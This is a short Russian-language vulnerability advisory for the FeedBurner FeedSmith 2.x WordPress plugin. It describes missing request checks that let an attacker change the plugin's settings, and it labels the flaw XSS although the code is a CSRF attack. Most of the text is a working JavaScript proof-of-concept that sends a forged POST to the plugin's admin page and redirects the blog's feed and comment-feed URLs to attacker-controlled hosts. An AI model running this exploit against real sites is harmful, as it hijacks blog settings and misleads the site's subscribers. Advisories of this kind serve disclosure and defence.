Программа: FeedBurner FeedSmith 2.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за того, что
приложение позволяет пользователям выполнять определенные действия через HTTP
запросы не осуществляя проверки. Атакующий может изменить некоторые настройки и,
например подменить записи блога.

Пример:

// Simple Proof of Concept Exploit for FeedSmith Feedburner CSRF Hijacking
// Tested on version 2.2.
t='http://the-target/wordpress/wp-admin/options-general.php?
    page=FeedBurner_FeedSmith_Plugin.php';
p='redirect=true&feedburner_url=http://hijacking-your-feed.com/with/new/feed&
    feedburner_comments_url=http://hijacking-your-comments.com/with/new/feed';
feedburner_csrf = function(t, p) {
        req = new XMLHttpRequest();
        var url = t;
        var params = p;
        req.open("POST", url);
        req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        req.setRequestHeader("Content-length", params.length);
        req.setRequestHeader("Connection", "close");
        req.send(params);
};
feedburner_csrf(t,p);

 



Оставить мнение